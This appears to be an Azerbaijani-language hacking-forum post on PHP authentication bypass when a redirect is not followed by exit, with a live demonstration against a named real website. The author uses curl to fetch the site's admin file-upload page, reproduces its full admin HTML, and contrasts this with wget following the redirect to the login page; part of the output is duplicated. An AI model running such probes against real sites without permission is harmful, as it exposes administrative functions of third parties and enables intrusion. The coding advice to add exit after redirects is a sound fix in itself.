Əslində verdiyin example özü də vulnludur:
Kod:
if(isset($_SESSION["root"])){
echo "ok";
}else{
echo '<script language="javascript">location.href="https://www.google.az"";</script>'; }
Analoji boşluq:
http://packetstormsecurity.com/files/117421/videosmateorganizer-bypassdisclose.txt
echo -dan sonra exit; dərhal.
Kod:
echo '<script language="javascript">location.href="https://www.google.az"";</script>';exit;
Əks halda skript işini davam elətdirir.
Eynilə bu header("Location: /login.php")
tipli redirectlərə də (admikalarda) şamil edilir.
Əks halda script vulnerabledir.
Live Nümunə:
Curl vasitəsilə.Fikir ver redirecti follow etmir və vulnu çox asanlıqla ayırd edə bilirik.
Burp/Fiddler də istifadə etmək olar.
Kod:
[blackhat@fedora ~]$ cd /tmp
[blackhat@fedora tmp]$ curl vors.am/cms/upload.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Pragma" content="no-cache">
<meta http-Equiv="Expires" content="0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" type="text/css" href="css/mycss.css" />
<script language="javascript" type="text/javascript" src="js/function.js"></script>
<script language="javascript" type="text/javascript" src="js/ajax.js"></script>
<title>vors.am</title>
</head>
<body>
<form method="post" name="form_lng">
<input type="hidden" name="lng" />
</form>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border="0">
<TR>
<TD width="20"></TD>
<TD bgColor=#ffffff><a href="http://www.weboptima.am" target="_top"><IMG src="images/optima.gif" border="0" width=100></a></TD>
<TD vAlign=top align=right width="850" background="images/backtop2.gif">
<TABLE cellSpacing=0 cellPadding=0 width="100%" height='90' border="0">
<TR>
<TD align="right">
<img src="images/arm.jpg" class="lng_img1" onclick="lng_sub(1)" />
<img src="images/eng.jpg" class="lng_img" onclick="lng_sub(2)" />
<img src="images/rus.jpg" class="lng_img" onclick="lng_sub(3)" />
</TD>
<TD vAlign=top align=right width="150">
<FONT color='white' style="font-family:verdana;font-size:12px;">
<A href="http://www.weboptima.am" style="text-decoration:none;" target="_top">
<FONT color='white' style="font-family:verdana;font-size:12px;"><B>WEB OPTIMA</B></FONT></A>, Inc.</FONT> <BR>
<FONT color='white' style="font-family:verdana;font-size:11px;">
Phone.(060) 44-05-35<br>
Cell. (091) 26-11-18<br />
Cell. (094) 54-34-65<br />
</FONT>
</TD>
<TD width=10></TD>
</TR>
<tr>
<td align=right colspan="2">
<FONT color='white' style="font-family:verdana;font-size:11px;">
© Copyright 1996-2012 All rights reserved
</FONT>
</td>
<TD width=10></TD>
</tr>
</TABLE>
</TD>
</TR>
</TABLE>
<table width="100%" align="center" cellpadding="0" cellspacing="0" height="100%">
<tr>
<td width="250px" valign="top" bgcolor="#EAEAEA" class="td_border_r">
<div style="padding:10px;">
<div class="g_m"><a href="free_text.php?parent_id=1" class="menu2">Գլխավոր էջ</a></div>
<div class="g_m"><a href="menu.php?parent_id=0&type=1" class="menu2">Որսի մասին</a></div>
<div style="padding-left:10px;">
<div class="menu_dinamic1"><a href="menu.php?parent_id=127&type=1" class="menu">Որսից առաջ</a></div>
<div style="padding-left:10px">
<div class="menu_dinamic"><a href='free_code.php?parent_id=155' class='menu'>Որսորդական օրացույց</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=156' class='menu'>Որսորդական հրացան</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=157' class='menu'>Թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=158' class='menu'>Շներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=159' class='menu'>Թակարդներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=160' class='menu'>Կրակելու դասընթացներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=161' class='menu'>Սարքավորումներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=162' class='menu'>Ռազմամթերքներ</a></div>
</div>
<div class="menu_dinamic1"><a href="menu.php?parent_id=129&type=1" class="menu">Որսի ընթացքում</a></div>
<div style="padding-left:10px">
<div class="menu_dinamic"><a href='free_code.php?parent_id=163' class='menu'>Վայրի կենդանիների որս</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=164' class='menu'>Կրծողներ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=165' class='menu'>Ճահճային և մարգագետնային թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=166' class='menu'>Դաշտային և տափաստանային թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=167' class='menu'>Անտառային թռչյուններ</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=168' class='menu'>Ջրային թռչյուններ</a></div>
</div>
<div class="menu_dinamic1"><a href="menu.php?parent_id=132&type=1" class="menu">Որսից հետո</a></div>
<div style="padding-left:10px">
<div class="menu_dinamic"><a href='free_code.php?parent_id=169' class='menu'>Ավար</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=170' class='menu'>Խոհարարություն</a></div>
<div class="menu_dinamic"><a href='free_code.php?parent_id=171' class='menu'>Խարույկի մոտ</a></div>
</div>
</div>
<div class="g_m"><a href="menu.php?parent_id=0&type=3" class="menu2">Մեր մասին</a></div>
<div style="padding-left:10px;">
</div>
<div class="g_m"><a href="menu.php?parent_id=0&type=2" class="menu2">Օգտակար հղումներ</a></div>
<div style="padding-left:10px;">
<div class="menu_dinamic1"><a href='news.php?parent_id=175' class='menu'>Նորություններ</a></div>
<div class="menu_dinamic1"><a href='news.php?parent_id=173' class='menu'>Հայտարարություն</a></div>
<div class="menu_dinamic1"><a href='news.php?parent_id=174' class='menu'>Առաջարկություն</a></div>
</div>
<div class="g_m"><a href="contacts.php" class="menu2">Կապ</a></div>
<div class="g_m">&&& &&&&&&&&&&&&</div>
<div style="padding-left:10px">
<a href="banner.php?parent_id=0" class="menu1">Գործընկեր</a>
<a href="dictionary.php" class="menu1">&&&&&&&</a>
<a href="loginPass.php" class="menu1">&&&&&&</a>
<a href="upload.php" class="menu1">&&&& &&&&&&</a>
</div><br />
<div align="center"><img src="images/line.jpg" /></div>
<table cellpadding="3" cellspacing="3">
<tr>
<td><a href="exit.php" class="menu"><img src="images/logout.gif" border="0" /></a></td><td style="padding-left:5px;"><a href="exit.php" class="menu">&&&</a></td>
</tr>
</table>
</div>
</td>
<td valign="top" style="padding:10px"> <div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>
</tr>
<tr>
<td>
</td>
</tr>
<tr >
<td >Ընտրել ֆայլը </td>
</tr>
<tr>
<td colspan="3"><form method="post" enctype="multipart/form-data"><input type="file" name="up_file" /> <input type="submit" class="button" name="sub" value="send"></form></td>
</tr>
<tr>
<td colspan="3" align="right">
</td> </tr>
<tr>
<td > </td>
</tr>
<tr>
<td colspan="3">
<a href="upload.php?letter=0&selType=0" style="margin-right:7px;">0 </a>
<a href="upload.php?letter=1&selType=0" style="margin-right:7px;">1 </a>
<a href="upload.php?letter=2&selType=0" style="margin-right:7px;">2 </a>
<a href="upload.php?letter=3&selType=0" style="margin-right:7px;">3 </a>
<a href="upload.php?letter=4&selType=0" style="margin-right:7px;">4 </a>
<a href="upload.php?letter=5&selType=0" style="margin-right:7px;">5 </a>
<a href="upload.php?letter=6&selType=0" style="margin-right:7px;">6 </a>
<a href="upload.php?letter=7&selType=0" style="margin-right:7px;">7 </a>
<a href="upload.php?letter=8&selType=0" style="margin-right:7px;">8 </a>
<a href="upload.php?letter=9&selType=0" style="margin-right:7px;">9 </a>
<br /> <a href="upload.php?letter=a&selType=0" style="margin-right:7px;">a </a>
<a href="upload.php?letter=b&selType=0" style="margin-right:7px;">b </a>
<a href="upload.php?letter=c&selType=0" style="margin-right:7px;">c </a>
<a href="upload.php?letter=d&selType=0" style="margin-right:7px;">d </a>
<a href="upload.php?letter=e&selType=0" style="margin-right:7px;">e </a>
<a href="upload.php?letter=f&selType=0" style="margin-right:7px;">f </a>
<a href="upload.php?letter=g&selType=0" style="margin-right:7px;">g </a>
<a href="upload.php?letter=h&selType=0" style="margin-right:7px;">h </a>
<a href="upload.php?letter=i&selType=0" style="margin-right:7px;">i </a>
<a href="upload.php?letter=j&selType=0" style="margin-right:7px;">j </a>
<a href="upload.php?letter=k&selType=0" style="margin-right:7px;">k </a>
<a href="upload.php?letter=l&selType=0" style="margin-right:7px;">l </a>
<a href="upload.php?letter=m&selType=0" style="margin-right:7px;">m </a>
<a href="upload.php?letter=n&selType=0" style="margin-right:7px;">n </a>
<a href="upload.php?letter=o&selType=0" style="margin-right:7px;">o </a>
<a href="upload.php?letter=p&selType=0" style="margin-right:7px;">p </a>
<a href="upload.php?letter=q&selType=0" style="margin-right:7px;">q </a>
<a href="upload.php?letter=r&selType=0" style="margin-right:7px;">r </a>
<a href="upload.php?letter=s&selType=0" style="margin-right:7px;">s </a>
<a href="upload.php?letter=t&selType=0" style="margin-right:7px;">t </a>
<a href="upload.php?letter=u&selType=0" style="margin-right:7px;">u </a>
<a href="upload.php?letter=v&selType=0" style="margin-right:7px;">v </a>
<a href="upload.php?letter=w&selType=0" style="margin-right:7px;">w </a>
<a href="upload.php?letter=x&selType=0" style="margin-right:7px;">x </a>
<a href="upload.php?letter=y&selType=0" style="margin-right:7px;">y </a>
<a href="upload.php?letter=z&selType=0" style="margin-right:7px;">z </a>
<br /> <a href="upload.php?letter=other&selType=0">մնացած ֆայլերը</a>
</td>
</tr>
<tr> <td> </td></tr>
</table>
</div>
</td>
</tr>
</table>
</body>
</html>
&selType=0" style="margin-right:7px;">y </a>
<a href="upload.php?letter=z&selType=0" style="margin-right:7px;">z </a>
<br /> <a href="upload.php?letter=other&selType=0">մնացած ֆայլերը</a>
</td>
</tr>
<tr> <td> </td></tr>
</table>
</div>
</td>
</tr>
</table>
</body>
</html>
[/code]
wget-in Redirectləri follow etməsi və vulnu görə bilməməyin bu yolla (Sırf brauzer də belə edir.)
[code]
[blackhat@fedora tmp]$ wget vors.am/cms/upload.php
--2015-05-05 00:37:08-- http://vors.am/cms/upload.php
Resolving vors.am (vors.am)... 50.87.153.244
Connecting to vors.am (vors.am)|50.87.153.244|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: index.php [following]
--2015-05-05 00:37:09-- http://vors.am/cms/index.php
Reusing existing connection to vors.am:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘upload.php’
upload.php [ <=> ] 2.83K --.-KB/s in 0.003s
2015-05-05 00:37:10 (872 KB/s) - ‘upload.php’ saved [2897]
[blackhat@fedora tmp]$ head -n 30 upload.php
<HTML>
<HEAD>
<TITLE>Vors.am</TITLE>
<META http-equiv="pragma" content="no-cache">
<META http-equiv="Cache-Control" content="no-cache">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<LINK rel="stylesheet" type="text/css" href="css/mycss.css">
</HEAD>
<BODY class="body">
<br><br><br><br><br><br>
<FORM id="frmMain" name="frmMain5" method="post">
<TABLE class="adm" cellSpacing=2 cellPadding=2 width=450 align=center border=1>
<TR>
<TD align="center" background="images/login-header.gif" height="60">
<FONT color=#ffffff size=5><STRONG>Log in to Admin</STRONG></FONT>
</TD>
</TR>
<TR>
<td align="center">
<table cellPadding=2 cellSpacing=2 border="0" width="80%" height="100">
<TR>
<TD rowspan="5"></TD>
<TD class=tables>
<font class="admtext11">Login</font>
</TD>
<TD class=tables>
<div align="right">
<font class=blacktext10>
<input type="text" name="login_text" maxlength="50" class="fields" />
[blackhat@fedora tmp]$ head -n 60 upload.php
<HTML>
<HEAD>
<TITLE>Vors.am</TITLE>
<META http-equiv="pragma" content="no-cache">
<META http-equiv="Cache-Control" content="no-cache">
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<LINK rel="stylesheet" type="text/css" href="css/mycss.css">
</HEAD>
<BODY class="body">
<br><br><br><br><br><br>
<FORM id="frmMain" name="frmMain5" method="post">
<TABLE class="adm" cellSpacing=2 cellPadding=2 width=450 align=center border=1>
<TR>
<TD align="center" background="images/login-header.gif" height="60">
<FONT color=#ffffff size=5><STRONG>Log in to Admin</STRONG></FONT>
</TD>
</TR>
<TR>
<td align="center">
<table cellPadding=2 cellSpacing=2 border="0" width="80%" height="100">
<TR>
<TD rowspan="5"></TD>
<TD class=tables>
<font class="admtext11">Login</font>
</TD>
<TD class=tables>
<div align="right">
<font class=blacktext10>
<input type="text" name="login_text" maxlength="50" class="fields" />
</font></div>
</TD>
</TR>
<TR>
<TD class=tables width="35">
<font class="admtext11">Password</font>
</TD>
<TD class=tables width="160">
<div align="right">
<font class=blacktext10><input type="password" name="password" maxlength="50" class="fields"/>
</font></div>
</TD>
</TR>
<TR>
<TR>
<TD class=tables width="35">
<FONT class="admtext11"><img src="kcaptcha/index.php?PHPSESSID=1e070ab2f6dcd4f80a2ce37495a7ad5e"></FONT>
</TD>
<TD class=tables width="160" valign="top">
<div align="right">
<font class=blacktext10><input type="text" name="kapcha" class="fields"/></font></div>
</TD>
</TR>
<TR>
<TD colspan="2" align="right">
<table width="50%" cellPadding=0 cellSpacing=0 class=tables border="0">
<TR>
[blackhat@fedora tmp]$ [/code]